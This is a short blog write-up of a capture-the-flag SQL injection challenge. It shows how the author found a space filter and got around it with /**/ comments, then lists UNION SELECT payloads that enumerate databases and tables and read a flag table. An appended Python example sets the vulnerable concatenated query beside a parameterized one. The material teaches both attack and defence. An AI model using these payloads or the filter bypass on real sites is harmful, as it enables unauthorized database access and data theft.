Simple examples related to SQL injection

巴扎黑, 2017-08-11 15:11:05

SQL injection means inserting SQL commands into a web form submission, or into the query string of a domain name or page request, so that the server is ultimately tricked into executing malicious SQL commands. Specifically, it is the ability to use an existing application to inject (malicious) SQL commands into the back-end database engine for execution: by entering (malicious) SQL statements into a web form, an attacker can obtain the database of a website that has a security vulnerability, instead of the SQL statements running as the designer intended. For example, many film and television websites have leaked VIP member passwords in the past, mostly through query strings submitted via web forms; such forms are particularly vulnerable to SQL injection attacks. Below I share a simple SQL injection example.

Entering 1, 2, and 3 each returns a corresponding result.

Entering ' produces an error, so

construct a commonly used SQL statement: 1' and '1'='1

No response. Try 1' and '1'='2

Still no response. Going by the hint, something is probably being filtered, so try changing the SQL statement:

1and1=1

This displays a result. Having determined that spaces are filtered, we use /**/ in place of spaces.

Try 1'/**/'1'='1

This returns a result.

Then build the SQL statements.

Determine which databases there are:


1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

You can see the results:

Check what data tables there are:


1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

This reveals the flag table. We guess it is in the web1 database and that the field is flag (it is actually in this page's database).

So:


1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

I am also a beginner, and I have referred to the write-ups (wp) of many experts. I hope you will point out any mistakes in what I have written, thank you!

According to the page hint, what exactly is being filtered? You can work out what is filtered....
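An added example, not part of the original article: the whitespace blacklist the walkthrough runs into, placed next to a parameterized query and an allow-list check, with the article's final payload as the test input. SQLite stands in for MySQL here, and the items table, the function names, the exact filter behaviour and the flag value are assumptions constructed for the demonstration.

```python
import sqlite3

# Final payload quoted from the walkthrough above (not a new one).
PAYLOAD = "1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1"


def make_db():
    """Constructed sample data; SQLite stands in for the MySQL back end."""
    db = sqlite3.connect(":memory:")
    db.execute("ATTACH DATABASE ':memory:' AS web1")  # gives a web1.flag table
    db.execute("CREATE TABLE items (id TEXT PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?)",
                   [("1", "one"), ("2", "two"), ("3", "three")])
    db.execute("CREATE TABLE web1.flag (flag TEXT)")
    db.execute("INSERT INTO web1.flag VALUES ('flag{constructed-sample}')")
    return db


def lookup_filtered(db, user_id):
    """Before: reject whitespace (assumed filter), then concatenate into SQL."""
    if any(ch.isspace() for ch in user_id):
        return []
    sql = "SELECT name FROM items WHERE id='" + user_id + "'"
    return [row[0] for row in db.execute(sql)]


def lookup_parameterized(db, user_id):
    """After: the value is bound as data and never parsed as SQL."""
    rows = db.execute("SELECT name FROM items WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


def is_valid_id(user_id):
    """Allow-list check: this form only ever needs a short decimal id."""
    return user_id.isascii() and user_id.isdigit() and len(user_id) <= 9


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1' and '1'='1", PAYLOAD):
        print(repr(value))
        print("  filtered + concatenated:", lookup_filtered(db, value))
        print("  parameterized:         ", lookup_parameterized(db, value))
        print("  passes allow-list:     ", is_valid_id(value))
```

The blacklist stops the version with literal spaces but not the comment-padded one, because the defect is the string concatenation rather than the characters allowed through; binding the value removes the injection point regardless of what the input contains.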
